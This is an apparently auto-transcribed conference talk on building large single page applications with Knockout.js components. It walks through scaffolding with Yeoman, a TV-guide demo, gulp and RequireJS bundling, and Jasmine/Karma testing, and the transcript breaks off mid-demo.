time to time, but I would just say to you don't worry about it. It's okay because I'm going to talk about lots of different things in this talk and I'll be changing subject like every five to ten minutes. So even if you get a bit lost, it's okay. You can pick it up again as soon as we move on to the next thing. Alright, so don't worry, chill out. Now I'm going to start off with a few slides. I will be doing mostly coding this talk, but I want to also, I want to communicate mostly ideas, concepts, challenges, solutions rather than just going like here's some code, here's some more code, here's some more code. So there will be a little bit of slides to start off with and I hope you'll find this valuable. So I just want to introduce some of the pros and cons of this single page application thing. I'll probably be talking about more about the cons than the pros because I think that's where there's more interesting stuff, but we will start with a bit of positivity. So what's positive about writing single page applications? Well, you know, why are we willing to give up on our 15 years of experience of doing server side page rendering? You know, are we mad? Why are we doing this? Well, you know, there's a few really key benefits and the chief among them is probably that we can produce the best user experience that can be delivered through a web browser. So we can produce applications that are just as responsive and nice to use or even more so than native desktop and mobile applications. But we're not writing native code, we're still writing cross platform code. And these two things together are the absolutely killer features of single page applications and this is pretty much the solid reason why you would be wanting to do this. And everything else is just a small benefit. But I'll just round it off a little bit. A few more smaller benefits are that as a developer, you can really just focus on the one technology. You can just get really good at your HTML and your JavaScript and your CSS and you don't have to spend half of your time doing that and half of it working with some almost unrelated server technology. So that can be nice for you. It also means that as you go further with this, you build more and more of your application that's able to run on the client without having that many server dependencies. And so if you use some kind of client side data store as well, you can even make your application work offline to some extent or at least work very responsively even in the presence of an intermittent network connection. So that's nice. And if you go really far with this and what you end up delivering is basically just static HTML and JavaScript files that talk to back end servers, then you can even deliver that around the world just by throwing it onto any static file host CDN type thing and you will get blazingly fast global distribution for basically no money whatsoever. So that's quite nice as well. But really, the two key things are the user experience and the cross flat formness. Now, my experience in this, I've worked on quite a few different single page applications, but this is the one I'm working on at the moment. How many of you have seen this or used it? Okay, wow, that's good, like a half of you. Right, so this is the new Microsoft Azure Management Portal. And this is a very, very large single page application. And it's quite advanced in many ways. It's got quite an advanced user experience. The user navigates around through these different blades that open up and they can slide back to where they came from. And this is really giving desktop applications a run for their money. I think you wouldn't even expect to do something as good as this in a desktop app. And it's got many other advanced features as well. Obviously, it's pulling in data from many, many, probably hundreds of back end servers to provide all the information about what's going on in your cloud services. And the user can even do things like customize the UI. So for example, here, they're going to pin this file system storage graph onto the home screen there. And then they could go along and say, hmm, I also want to keep an eye on the number of HTTP requests. So I'll pin that to my start board as well. And then maybe they want to customize it a little bit more by resizing things and moving them around. Maybe they don't actually need that giant map that serves no purpose, but just looks pretty for demos. So they're going to make that get a lot smaller and move it away and so on. And as you can imagine, this is a big, big project. We've got dozens of teams in Microsoft contributing code into this thing. So it's kind of massive. And we needed an architecture that was really going to scale very well, both in terms of allowing lots of developers who don't really understand it to contribute good code to it, but also in terms of providing really great performance for the end user. So we're not shipping too much code, and we're being efficient about all aspects of the delivery there. So that's what I'm working on at the moment. And after my experience of working on that, would I say that it's easy to build a single page application? No. I would not say it is easy. I would say it can be very challenging compared with many other types of architectural patterns that you could try and follow. And I will be mainly focusing on the difficulties with it in this talk and ways that you can overcome one. So to summarize some of the challenges that I think that we've faced and that you will probably face if you build a large single page application, let's start with staffing. It doesn't seem like a very technical problem, but it's kind of the root of many other problems. If you are working so heavily with JavaScript, it's not enough to have just one developer who's great at JavaScript. You need your entire team to be great at it, and to all understand the libraries and technologies that you're using. And then what about architecture? With single page applications, there aren't any de facto standard architectures, which is an enormous challenge. You've got so many decisions that you have to make about what technologies you want to use and how to combine them. And no one's really giving you the answers there, or are they? We'll get to that. And then page weight. In our case, we've got many megabytes of code. And what are we going to do? Just ship all that in one big blob down to the browser? Are we going to load every single file independently? It's very difficult to figure out what the optimal strategy is there. And then maintenance. All software projects struggle with maintenance to some extent. But if you are relying primarily on JavaScript and CSS, well, those technologies are not really known for their easy maintainability. So although it can be done, it can be a challenge. So we'll look at ways to mitigate that. Library dependencies. Now, I've chosen this Tetris icon to represent library dependencies, because that really summarizes how I feel about it. Because on our project, barely a week goes by without someone saying, we now need this extra third party open source library. Oh, and we need this other one and this other one. And they've all got to fit together and work together nicely and not blow each other up in any way at all. So we've got to keep managing that all the time. Build and test time. Maybe you don't even think that's a big problem for a single page application, but it was for us. Until a few weeks ago, we had this three minute build cycle between every time you touched a file and you were able to see it running. And that was horrible, absolutely horrible. We have thankfully dealt with that now, but unless you're careful, you could end up in this situation as well. Performance and memory. If you were building a small single page application, maybe you don't care if it leaks a bit of memory. Maybe you don't even notice because the user will just leave and do something else in a minute anyway. But with a massive single page application, you cannot afford to be leaking memory over time. And that can be a real challenge. Okay, good. So those are some of the difficulties and we'll look at ways of mitigating many of them through this talk. And as you know from the talk title, I'm going to be talking quite a lot about knockout. Now I'm not saying knockout immediately solves all those problems, far from it. There's a lot more you need to think about, but knockout is the library that we use to build the Azure Management Portal. It's what runs all of the UI that you've seen there. So let's start by asking, why do you think we chose to use knockout on that project? And I know that some of you are thinking, oh, well, it's very obvious why you chose knockout, isn't it? Because you're enormously biased towards using knockout. So that's why you chose it. But no, that's not the reason, honestly. So when they chose to use it, I was not on the team. The causality is the other way around. I joined that team because they chose to use knockout to do some really interesting things. So why do they, independently of me, choose to use this library? Well, a number of reasons. Let's go through a few of them. One of them is very deliberately a library. It's not a framework. Like some of the other larger model view frameworks in JavaScript, it tries to just be a library. It's not trying to dictate your overall architecture. It's designed from the beginning to play well with lots of other different components, which is very useful if you're building a large application and you can't take too much of a big gamble on any one thing. Another thing, knockout system of observables gives us precise control over which parts of our data are observable and in what way. And that means that we can be very confident about scaling to work with enormous amounts of data. Because we know that when one thing changes, it only affects the immediate things that that changes. The system doesn't have to recompute 10,000 other unrelated computer properties just to see if they might have changed. Knockout knows what has changed because it knows the dependency graph. So that gives us the confidence to scale a lot more. Another thing, well, firstly this is meant to be a thumbs up icon. I know it looks more like a boxing glove, but that kind of fits the theme. Anyway, the point is here, knockout is not the best known of these kind of libraries. There are others, particularly things like Backbone and Angular that are better known. And so those would have scored more highly on this particular criteria. But knockout is well known enough that it's no problem for us to find developers who understand it and it's no problem to find third party resources and libraries to work with it. So it scores well enough on that point. Finally, on the good points, knockout has always prized backward compatibility, both with its own previous versions and with older IE versions. So even the very newest stuff, the new features that I'm going to show you today that deal with components and custom elements and stuff, it still supports IE 6, which is almost starting to seem ridiculous at this stage. But we just haven't had a reason to drop backward compatibility. So we're keeping it there for now at least. So yeah, fantastic compatibility. Now one of the things that knockout hasn't ever really attempted to do particularly much, and this is a point against it in many people's view, is it doesn't give you a ready made architecture. It leaves a lot of decisions up to you. But maybe something I'm going to show you today helps a little bit with that. So let me give you a demo of something new that's coming to knockout 3.2, which will be released fairly soon. Now I asked before this talk and most people said they'd use knockout. I think maybe even everybody. So I'm not going to give you an intro to knockout. This is like a hello world scenario that I'm going to convert into a component. So you probably all understand this immediately. I've got a view model with a name property, which is observable, and I'm binding this to my view. And then I've got a text box here whose value is that name property. And then I'm saying I want to output the uppercase version of that name into a strong element there. So it'll show up on the screen. Let's just run it. And it will do exactly what you expect. So when I enter a name into here, then the uppercase version shows up here and everything stays in sync. Straight forwards, you've all seen that kind of code before, nothing clever. Now how can I convert this into a reusable component? Well, let's use the new components API. So I'm going to say knockout.components.register. And then I'll give a name to my new component. And I can call it anything I want, but I'm going to call it name editor. And then I give a configuration for my new component. And a component consists of a template and a view model. And these can be loaded from many different places. This is all pluggable. You can get them from AMD or you can hard code them in or whatever you like. For this Hello World demo, I'm just going to hard code the template straight into my config here. So I'm going to say template is this string. And I'm just going to cut this out here and drop this in here. And similarly on this line, I'm just going to drop that in there. Now of course, normally you would really load from external files. I'll show you that in a minute. But this is helpful to get started. And then I'll define a view model. And I can define that in a few different ways. But the way I'm going to do it here is a constructor function. So here my constructor function is going to define a name property. And I'm going to give that the same thing that we had before. So here's my name property of my component view model. Okay, good. So now I don't actually need this old view model at all anymore. And I can get rid of it from here. And if I want to use my new custom components, I can do it just like this. Name, editor. Great. A custom element. Let's see how this works then, shall we? Come back to my browser and reload. And you'll see it's still working as it did before. And this is now a reusable component. So I can, if I want to, let's say, well, let's have three name editors. Why not? And then when I go back, I've now got three name editors, which are all independent. They've all got their own view models and so on. And it's going to efficiently load the view models and the templates, what's it called, in parallel as it needs to render that UI there. Okay. So that's all very good. And there's loads more that we can do with components as well. For example, we can pass parameters into them. We can get parameters back out of them. We can subclass them. We can load them on demand. We can preload them. You've got a lot of opportunity there to compose a large application out of this system. And you may notice that this somewhat resembles the forthcoming web components notion, where you define custom elements and give behaviors and such to them. And yes, that's of course exactly what it's inspired by. But rather than waiting another like five years or whatever until every browser that your customers use supports that, you can just use that now even right back to IE6 because of the backward compatibility that we prize so highly. So that's a sort of hello world of components. But in this talk, I don't want to stop at this hello world level. I want to give you an idea of an application architecture that's realistic and could actually scale up to build a very large project. And of course, testing a realistic large architecture involves making a lot of decisions. What libraries are you going to use? What kind of modular loader are you going to use? What kind of testing system are you going to use? And there are so many decisions there that you could spend weeks just thinking about and reading people's blog posts and changing your mind over and over. So would it be nice if you could just sort of scaffold up a nice happy starting point just to see how this works and you could even build on that realistically to make a very large application? So scaffolding systems. What scaffolding systems are there? Well, there are ones built into things like ASP.net and other server side frameworks. But besides that, you're probably aware by now that the front end world is kind of a thing in its own right. Front end developers, that is people who build applications that run in the browsers, well, we've got our own preferred technology stacks. We've got our own libraries. We've got our own conventions and culture, our own thought leaders. Front end development is a thing now. So if you're going to get good at front end development, you probably do yourself a favor of understanding these front end technologies. And so what I'm going to show you is how we can use a scaffolding system which is kind of a de facto standard in the front end world called Yeoman. And this allows us to scaffold our starting points and different application pieces for many different technologies. So there are scaffolders for pretty much all the frameworks you've heard of and of course knock out is one of the things that there are many different scaffolders available for. So let me give you a little demo of scaffolding something up that produces a realistic architecture for us with components. So I'm going to, we're going to need a little scenario for an application that we want to build and it doesn't really matter because this talk is about the architecture and not about the actual application itself. But just as a happy little gimmick, I decided, okay, let's make a website for like a cable TV company or something that wants to display an online TV guide and lets people navigate through channels and see what's on and that kind of thing just to set us a bit of a scene for us. Now we need a back end that's going to provide the raw underlying data for that and so I've already implemented that and as it happens I've did it with web API but the technology there doesn't matter at all. I could have done it with node or with basic or assembly or whatever like crazy thing that you want to do as long as it spits out JSON then our front end doesn't care and we're going to keep the front end totally separate from it. So I want to scaffold up a front end for this and at first I'm going to need to install the yeoman tool so I'm going to go NPM node package manager install globally yeoman. So like pretty much all of the other front end tools, yeoman is built on node.js and so we'll use the node package manager to install that and this is going to go off and install it for my user account and it says okay everything's looking good you've installed yeoman well done. Now yeoman doesn't come with any template or maybe it does I don't know but it doesn't come with all the templates that you want by default. So let's install the knockout template into it. So let's say NPM install globally the generator that's what yeoman calls them all called KO for knockout. So there are various different generators available for knockout and this one called generator KO that's the one that I've put together so I can vouch that at least it's sane some of the others are probably really good as well but I don't really know. Anyway we've got that now so we can use this generator. So let's go into the folder where we're going to spit out the code. So we'll go into the TV guide project here and I'm going to make a new directory called TV guide dot front end and I'll change into that directory and now I'm going to use yeoman. So I'm going to say yeoman I would like you to please scaffold up a knockout application yo-ko and that's going to go and do its thing now and firstly it starts with this slightly embarrassing looking ASCII art thing don't blame me for that that's just what yeoman does by default kind of that's how it rolls we can ignore that we just have to answer its questions what's the name of your new site okay how about TV guide that makes sense what language do you want to use ooh we could use typescript or JavaScript well I'll get on to typescript later let's just do some JavaScript for now do you want some automated tests with jasmine and karma yes please why not I'm not going to talk about tests immediately but I will get to them hopefully before the end of this talk so that is now going off and it's using Bower the JavaScript package manager to fetch all these libraries that we're going to use knockout jQuery jasmine require js and so on and it's also installing a test runner called karma that I'll show you in a little bit alright so that's now gone and done its thing and if I look in this folder now you'll see there's quite a lot of stuff there but it's a little bit difficult to understand it through the command line so let's look at it in visual studio now I'm going to do this slightly naff thing here of doing it as a website project so I'm going to import these files as a website project and that allows visual studio to just look at the files that are on disk and not have any actual you know CS project or anything like that now if you were going to do this for a longer period you probably would want to use a web application project which would work absolutely fine too you then just have to keep remember to add files as you go along or of course you can just not use a visual studio at all you can use sublime or anything else and then you don't have to think about that sort of stuff but of course this is going to get way better with the new esp net vnext tooling which is going to take away the need to think about things like project files but anyway for this demo it's very convenient for me to do it as a web application project in a real project I would either use web application or I would just use sublime anyway what have we got in here so we've got some node modules because the build and test system that I'll show you is like most front end tooling built on node so we've got various things in there to do with gulp and karma I'll show you that later we've also got a test folder you can guess what's in there we'll get to that and we've also got some other stuff to do with build and test that we'll think about later so now let's just look at this source folder what have we got in there well some stuff is kind of obvious we've got css and html you know what those do we've also got bower modules this is why bower has installed the javascript libraries that we're depending on knockout and require js and other stuff and then the real application code is in these two folders app and components now in app we've got things to do with the application startup so that's the routing configuration and where the module should be loaded from and so on and then we've also got components and let me actually run this before I show you the component source code so if I want to run this all I have to do is point any web server at all to this source folder because it's just static files I could use is or anything else I like engine x anything you want but for convenience I'm just going to use this node based HTTP server which is a command line tool and I'll tell it to serve up the contents of this source folder so that's running now and I can open that in my browser so let's go to localhost 8080 and you can see here is my starting point for my application and let's just check there's no errors there's no errors everything's good okay so we've got this simple bootstraps based UI here we've got the traditional home and about pages and as I navigate around it's doing this client side routing there I'll I think I'll call it routing since I'm British it's doing client side routing there and you can see that up in the URL and it's got no real functionality other than you can click this button and it's going to just change a message just to show you how it works so let's see a bit of code there the about page component is exceptionally simple it's nothing more than a single static HTML file and that just shows that a component doesn't have to have any more than just static HTML if that's all you want but of course most components will have a combination of a view and a view model so the home one for example has got this view here you can see it's got that message and it's got a button that you can click that does something and when we look at the code there you can see that what this is is a class that's got a message property and when you do something it changes the message so that's how that works and also it's been defined as an AMD module which allows it to be loaded on demand if that's what we want and we'll get to that in a minute okay so that's our starting point but let's add some functionality to this I want this to be a TV guide website so I want to fetch some data about what's on TV and display it in a nice sort of grid format so I'm going to do this by creating a new component and I'm going to call it a program grid and then the idea is I can reuse my program grid and give it different parameters anywhere I'd like in my application so I could create a component if I wanted by creating the files directly in Visual Studio but it's slightly more easy to scaffold it if I want so I'm going to go back into this folder and I'm going to ask Yeoman would you mind be so kind as to create me a new knockout component and we'll call it program grid so that is going to scaffold up the files needed program grid HTML and JavaScript and it's registered it in my application startup file so now if we come back to Visual Studio and we reload you'll see we've got our program grid down here and this is a nice new reusable component and let's see what's in there not very much currently it's just a sort of hello world thing where it displays a message and it passes that message from the view so here my constructor sets a message property with some observable object and that is what gets rendered in the view it's also got a dispose function on the prototype there which you can use for any cleanup if you want to but I don't need that in this example so let's get rid of that and we'll just keep it a bit simpler so if we want to use this program grid from somewhere else in our application it's very very easy indeed all we have to do is just use a program grid element now you don't have to use custom elements if you don't want to if you like you can use the knockout component binding and bind a component into a div or whatever else it is that you'd like but I quite like using this custom element so that's what I'm going to do and now I don't need the rest of this view so let's get rid of that and we'll just change the title to what's on TV okay so now let's go back to the browser and we'll reload and we should see that the title changes what's on TV and we can see the program grid has been injected and bound for us just like you would want it to be and the good thing here is that the home component doesn't need to know anything about the program grid component at all it's loosely coupled which allows your code your components to be quite easily reused in different places and it gives you lots of interesting opportunities when it comes to optimizing your build system as well as I'll talk about in a minute but we can still do things like pass parameters in and get data back out right then so let's put some real functionality into this program grid now I want to actually fetch some data from my back end and render it so this is I'm going to do it in a pretty straightforward way just because this doesn't need to be complex here's a very simple way of getting and rendering some data I am just going to define a channels array on my program grid here so this is an observable array because it can change over time maybe we would use web sockets to push new information in real time or something it doesn't matter but in any case I'm just making it observable so it can change and then I'm populating it in an incredibly straightforward way just do an Ajax request to the back end and stuff the result into the channels array and we're done let's render this in the view now shall we I'll go over to the view and I'll just delete the stuff that I had before I'm going to drop in some markup that I've already prepared so my pre-prepared markup here is going to use an html table and it's going to say in the body of that table iterate over each of the channels and for each of the channels let's create a table row and on each row we're going to have two columns the first column will display an image with the TV channels logo and then in the second column will iterate horizontally across all of the programs and for each program will display a div with the title start time and end time and so on so let's see if that works shall we I think it might not work to see but let's just see so let's hit reload and we'll see nothing seems to be happening and oh dear we've got a connection refused from the back end that's just because I haven't started my back end running just yet and I just realized that a minute ago so let me start my back end running now with a bit of control f5 magic there and so now I can reload and this time it successfully fetched some data from the back end there and we can just see all these different TV programs and stuff but the layout is absolutely horrific right now so let's use a little bit of CSS to end this up and this talk is not about CSS so of course you can use less or sass or whatever you like and you can plug that into your build system that I'll show you later but I'm not really interested in that so I'm just going to dump a bit of ready-made CSS into this file right now just so that we can move on to something more interesting so here's my ready-made CSS I'll come back and I'll hit reload and now you'll see it really does look like an actual grid of TV programs that you would expect to see from your cable TV company or whatever sorry that the title is a slightly distracting alright so that's good but currently I've not really shown you anything particularly clever like currently I'm not even passing any parameters into my grid what if I want to control which channels show up like maybe we want to show all channels or maybe we just want to show the channels that you'll subscribe to so let's have a go at passing some parameter into there I'll go back to where the grid actually gets used and I'm going to say I'll pass a parameter prams equals let's say only my channels true so now I'm passing that parameter in and if I come back and reload nothing changes at all because my component doesn't know anything about this particular parameter name so let's make it aware of that so I'll go into the view model for that and I'm going to define a new property on my view model here called Fint filter channels and what that's going to do is it's going to take the existing set of channels and it'll run an observable filter over that array so that'll keep updated as the underlying array changes and what it does is it works out whether or not we're currently being asked to run a filter and if we are then we'll only use the channel if we're subscribed to it and if we're not filtering then we'll just use all channels so now if I come back and reload then why didn't that do anything I think it's because I didn't really reload properly then nope not for that reason maybe I didn't type it correctly some some way only my channels true oh that's right because currently I'm still binding to the full set of channels I want to bind to just the filtered channels so now if I reload you'll see we just get the filtered channels there so that's how we can pass a parameter in and of course it doesn't have to be a hard coded value like I've shown you here it can be an observable property as well and that will automatically stay updated and now we've got this we can reuse our grid in various ways with different parameters so let's have all channels down here and we'll say only my channel is false and now when I reload we're going to have two grids now we'll just have my channels at the top and we'll have all channels below it so that makes it very nice and convenient to reuse okay now let's change our focus slightly let's think about performance for a little bit or at least performance in terms of how this stuff is delivered to the browser let's see how many HTTP requests we're currently using so if I go into the about tab here and I reload then I look at the let's look at the network tab if I zoom in a bit you'll see we're making 18 HTTP requests to run that page even though it's completely trivial what HTTP requests are we doing? Well we're loading bootstrap and require and jQuery and knockout and crossroads and bootstrap and then we're loading all of the components like we're loading the about page we're loading the navbar template we're loading the navbar view model everything is loading separately and this is in some ways good and in some ways bad now it's good in that in the files that we're seeing in the browser dev tools exactly corresponds to the files that we see on our IDE which is really convenient in development and another good thing is we've got incremental loading here so if I start on the home page and I reload and then I clear the list of requests as soon as I switch to the about screen you'll see it dynamically fetches the template there so we've got automatic dynamic loading of different views and view models as we go along because it's all built on required.js so that's in some ways good but it's also really bad because we're just doing loads of HTTP requests wouldn't it be nice if we could bundle them and minify them you're all familiar with bundling and minifying right so let's say that we do want to do some bundling and minifying how can we do that well this brings us on to the topic of JavaScript build systems and since this talk is not all about knockout I'm also just want to cover some general principles for writing efficient single page applications let's just think about build systems for a minute so you are all familiar with other build systems like MS build or enant or something I don't know what you use how many of you have used either grunt or gulp before okay reasonable number like 20% okay I'll go through this fairly quickly then because a lot of you know this so these are JavaScript build systems that are like most front end tools built on Node.js and the idea is that for example with grunt you run it from the command line and it's going to go through a series of tasks that you've configured maybe to do things like link your code to come to bundle it to minify it to output it to a certain location and you run all that from the command line and that's very convenient and it's all fully designed to work with front end technologies like things like cof script type script all that kind of stuff so that's good now let's just compare these two things a little bit grunt has been around for a little bit longer of the two and what it's like to work with grunt is like this the configuration system is fairly declarative so if you want to configure for example a concatenation step you would declare oh you're going to get all the files from this location you're going to output to them to this other location and you would use declarative config for all the different tasks that you want it to do and you would also get it to load the code that executes those tasks from npm that's the node package manager and then finally you would give names to your tasks for example you say that the default task involves running the three three different steps in sequence queue in it and then concat and then minify and this is quite nice actually I do like it I've used it for over one to two years now this is what we use to build knockout and it generally works pretty well but there's also this newer thing that's come along more recently called gulp and the argument with gulp is what about if we don't want to keep dropping all these temporary files in different locations and picking them up and generally having to figure out different declarative config syntaxes wouldn't it be nice if we could just stream our files through a configuration that we define in code and so what it's like to work with gulp is a little bit more like the following now I've I started using gulp maybe three or four months ago and I really like it actually this is generally what I'm considering as my default system for new projects now I do enjoy it but that's not to say that grunt isn't still good so what it's like to work with gulp is a bit like this you start by declaring some some imports that you need to execute the various tasks that you want and these will all come from npm like the code to minify stuff and so on and then you would also declare tasks that you give a name to so you might say that when I want to process my scripts which is just an arbitrary string I want you to grab all the files under a certain directory and then I want you to pipe them through js hint to check for any errors and then pipe the results from that through a minification process with no temporary files this is all in memory and running in parallel and then pipe that all through a concatenation step and pipe all that out back onto disk and similarly for css maybe you'll do a similar thing except that you pipe it through a less processor and then finally you give names to the the tasks that you're working with so maybe your default task involves running scripts and styles in parallel because it's all going in parallel through streams and maybe you also want it to watch all the files in a certain folder so that when you change something it's going to rerun certain tasks so that's what it's like to use gulp and I really like it so that is what this scaffolding system sets up for you by default let's have a go at using it shall we and before we start I want you to realize and or remember at least the situation that we're in right now so the situation right now is that when you reload this about page we've got 18 separate HTTP requests going on to fetch all the different parts of the application and that is a bit much to be completely honest also notice that in the application folder we've got a source folder here but we have not got a disk folder and disk is where we're going to put the build output so we'll see that appear in a second now we have already got this gulp file that was set up for us I'm not going to go through every line of it but just to give you a quick overview it's got various tasks things like processing JS, processing CSS, HTML, cleaning all the build output and then finally it declares that the default task if you run it with no arguments involves running these three other tasks simultaneously and then giving this message so I will show you a little bit more of that in a second but let's just run it first so I'm just going to run gulp on its own to run the default task and that's going to run these things that have been declared by the scaffolder so that's doing its thing now it takes a few seconds it's going to take like seven seconds and of that seven seconds more than six of them are just running ugly file.js so that's pretty much all the cost of doing that if you just temporarily comment that out it will all go really fast but I want to have that on for this talk so that's output everything to the disk folder so if I come back to VS now and I hit reload we'll see a disk folder has appeared and it hasn't got very much in it really it's got one CSS file one HTML file one JavaScript file and some web fonts we won't worry about those things so it's got the what on earth is that supposed to mean go away so it's got these three files that there's basically all that we need to run our application and if I want to run that now I'm going to stop my web server that is serving the source folder and I'm going to start the web server serving the disk folder instead so this is what you would actually publish to the public internet and people would load to their browsers and now if I come back to my browser and I hit reload then instead of doing 19 requests it's now done three requests one HTML file one CSS one JavaScript and everything has been nicely bundled up into there and I'll show you more about how that works in a second but we're not completely finished yet because it doesn't quite work if I switch on to the home screen we'll get an error what's this error then we're getting a 404 not found it's trying to dynamically load our program grid and it's not there because the program grid isn't there is a standalone file in the disk folder so why is this is this some kind of a bug like why didn't include the program grid in the build output it's not a book otherwise I wouldn't have shown you I would have pretended it wasn't there it's quite deliberate so the system of components is very deliberately all about being loosely coupled and it's so loosely coupled that the required JS optimizer that walks through the dependency graph to find out how all of your code depends on other code doesn't even know that you're using the component it's just too loosely coupled and also sometimes you're going to want to preload your components and other times you'll want to dynamically load them so you need to declare which components are going to be included in the preloaded bundle and that's what I didn't do just yet so let's do that I'll go to my gulp file and you'll see up here this is the required JS optimizer config the required JS optimizer is the thing that understands all the different AMD modules that I've got walks through them understand the dependencies and is able to output bundles and currently it's including in the default bundle everything that the app startup file needs so that's all the library code and the routing config and everything and then I also explicitly have to reference any components that I'm using that are not known to the startup file so you can see the navbar the home page and the about component because that's nothing more than an HTML file you have to use a slightly odd syntax to import it because it has to get converted to a JavaScript wrapper anyway I want to import I want to include the program grid component here so I'm going to reference that it's in a folder called program grid and the actual module name there is program grid so that's now included let's go back and I will rerun gulp there and then that will hopefully be included in the scripts.js bundle file when it's outputted so now that's done I'll come back and I'll reload and instead of getting an error this time I will get my actual application working exactly as it should so that's good or is it's good really let's just take a step back for a minute so what we've accomplished now is that we're now preloading absolutely everything in a small number of files and that's kind of cool because we're doing a small number of HTTP requests but it's also not cool in a certain way because we're preloading everything even the stuff that the user doesn't even see and this is a bit of a problem for us on the Azure management portal right now because as it stands we preload every single thing there is whether or not you are ever going to see it and that is too much stuff really so we are working on producing a system now where it preloads some things and dynamically loads other things and out of the stuff that's dynamically loaded you don't still want to get all the files individually you still want to declare bundles that represent the sort of units of navigation that a user will normally do so you preloaded the right stuff and the other stuff comes in appropriately sized bundles can we do that with this build system of course we can otherwise I wouldn't be talking about it so let's go and have a look so you can see that we've got this bundles config here now require.js only got bundles support proper bundles support in the last few months so I'm betting that most of you haven't really used this bundles feature just yet but it works really well so what I can declare is arbitrary names for other bundles that will be packaged and loaded as a unit so let's say that I don't want to load the about page up front I only want to load that on demand so I'm going to take it out of my list of preloaded things there now I'm going to create a new bundle and I can call this anything I want let's call it about stuff alright and I can put an array of all the AMD modules that should be included in that bundle and I'm just going to put this about page thing in there now it's just a simple html file but there's no reason it's limited to be that it could be any AMD module including one with dependencies that have other recursive dependencies and so on and the bundler will figure all that stuff out for us so now when I come back and I'll reload gulp again instead of producing just a single scripts.js file when it's finished has it finished yet not yet here it comes if I come back and I reload my mouse is not working seriously my mouse is not working what's going on that's strange okay I'll hit reload now instead of just having scripts.js we've also got about stuff.js so that's been outputted as well and if we go over to the browser and I come over and I'm on the home page and I hit reload it currently is loaded everything it needs but it hasn't loaded anything to do with the about page at all and if I go to the network tab and I clear what it's already got there and I switch to about you'll see it dynamically fetches about stuff.js because it knows that the files it needs are in that bundle and inside there you'll see there's just the stuff that we need to render the about page it's just trivial right now but it could be a lot more and the important thing to understand here is that this bundle config has no impact whatsoever on my application architecture in development I do not have to think about this at all I just work with all the files as they are on disk and then the choice of bundling strategy is something that you can think about when you're going to production and as a sort of matter of DevOps so your DevOps team or you if you do DevOps as well can think about different bundling strategies and try out them different strategies without affecting your application architecture in any way at all and that's a really powerful and useful feature of this system. Okay right so that's one aspect of an important feature when building a large single page application is thinking about how the content gets delivered to the browser. Another aspect that it would be rather remiss of me not to mention at all is testing. Now how many of you test your JavaScript code? Alright so that's a lot less of you than write JavaScript code and I can understand that that's something I can definitely relate to because if you're working on a relatively small project testing JavaScript is an enormous overhead and is it really giving you the value that you need on a small project arguably not I mean what's the worst that could happen anyway I mean does it even matter anyway on a large project you don't actually have a choice because you will fail if you don't have decent tests for your large single page application and there are lots of different ways that you can do it. There are so many different choices for example you can do traditional unit level testing on your classes with mox you can test at a component level if you want to maybe you're still using mox at that level or maybe you're letting them use real services or you can even test the entire application all at once with a browser automation tool like Selenium or something like that. Now I will not say to you that any one of these things is the right way or that you should do more of one than another or anything like that because honestly I think it depends on the type of application you're building and where the value of your application is where is the business logic does it only make sense at an end to end level does it make sense on an individual class level that's up to you to decide. The only strong opinion that I'm going to give to you is please be selective about what types of tests you write probably the only wrong strategy is to just go let's test all the things in always possible because that's going to cost you a lot if anybody says you should just write every possible test of everything then you should probably punch that person and well I mean I am not a lawyer but legally I think you would be okay doing that I mean I haven't consulted a lawyer it's just my guess because yeah exactly because it's such a dumb opinion it's not going to cost you heavily to do that be selective about what you write tests for and make it match the places where your application has value. Now I cannot tell you that there's only one right way of doing testing but I can show you some examples of testing technologies. So this scaffolding system that I used here that sets up some tests with Jasmine and Karma. Now the notion of best practices in front end world has a half life of about three months so by the time anyone watches the recording of this it might have changed but as of today Jasmine and Karma are very much considered to be best of breed testing technologies so that's what this is going to use. So let me show you a little bit of how this works right now. We've got this test folder and inside the test folder we've got Bower modules to do with testing like Jasmine and we've also got some stuff to do with running the tests and then we've also got a sample test for the homepage component. It's very trivial let me show you what it does right now. So what it does right now is it uses Required.js to pull in the object that it wants to actually test then for this example test it creates an instance of homepage view model and it checks that the initial message is some value then it changes the object and it checks that the message changes in some way. So this is obviously trivial and a good quality valuable test would be exercising some kind of business logic which this does not but this demonstrates the testing technology and that's as far as we're going to get in this talk. So let's have a go at running this test shall we. You can run it in various different ways but the first way I'll show you is running it in a browser so I'm just going to open the Synglex HTML page in a browser and when that pops up you'll see here's my test running through the Jasmine browser test runner. You won't always want to run your tests in a browser but it's really good to be able to do so because of course you've got your debugger built into the browser there and that is absolutely invaluable when understanding why your tests are not passing or even worse why they are passing when they shouldn't be. So you will use the debugger very slowly to solve that problem but you don't always want to be working in a browser it can be very convenient to run your tests from the command line and that is where Karma comes in. Many of you use Karma, smallish number we're talking 5 maybe 10% at the most there. Alright so not many people are using this yet but it's growing in popularity and with good reason because it's really good. It's a great tool if you are into your single page applications. It's a command line test runner and so the idea is you run it on the command line it opens up real browser instances like actual instances of Chrome or IE or something and then it pushes tests into them and uses web sockets to pull the results out of them so it can get the tests and the results very very fast and give you really great continuous feedback as you're coding and of course being command line driven is very easy to factor into any sort of build or CI process that you've got. Now if you want to run this you need to define a Karma configuration and that's what has been declared, that's what's been scaffolded out for us by this system. Now to be honest with you I'm slightly disappointed with this choice of file name here. If it's me I would have called it Karma Karma Karma Karma configuration which I think it would have been cooler but they apparently didn't think of that so it's rather boringly karma.conf and what that does is it tells Karma where to find everything that you're using and it's a little bit fiddly to set that up because to get Karma to work with Require.js, to work with Jasmine, to work with Knockout components, to work with everything else that you're using simultaneously it's pretty fiddly and it might take you a couple of hours to get that working or it did me at least but thankfully now I've done that that's all there in the scaffolder and you can just use it. So let's have a go at running Karma on the command line. So let's say Karma start and what that will do is it will fire up a browser instance and it's going to start pushing tests into that as much as it needs and if we look back at the command line here you'll see it's executed one of one tests and believe it or not it passed great. Okay so that's good but now I want to show you how it gives you feedback as you're working. So I'm going to move this down to the bottom of the screen here and make it just occupy this little bit of the bottom there and I'm also going to move my VS window a little bit so we can still see that. And now let's write some more tests shall we? And so let's start with it and then because I don't actually have any business logic in this application this is obviously very fake so I'm just going to do a silly arithmetic test but you will understand how you can apply this to exercise your real logic. So let's do it should do arithmetic. Bit cheaty but I know. So let's declare a function here that our test will run and as soon as I press the save button here I'm going to click now immediately it realized that that test is there and it's going to run it and now we've got two tests executed and they both passed. Well done Karma. Alright let's put an expectation in there. Expect 1 plus 1, 2 equal 3 because I'm a moron. So let's try running that now. I'll press save and then it fails would you believe it? Oh let's review arithmetic. We'll fix that and we save it and it's working. Now the cool thing about this is it's not just watching my test files it's also watching the files that are being tested. So if some developer comes along and looks at this home view model and says oh do something that's not a very descriptive name is it? Let's change that to something else. 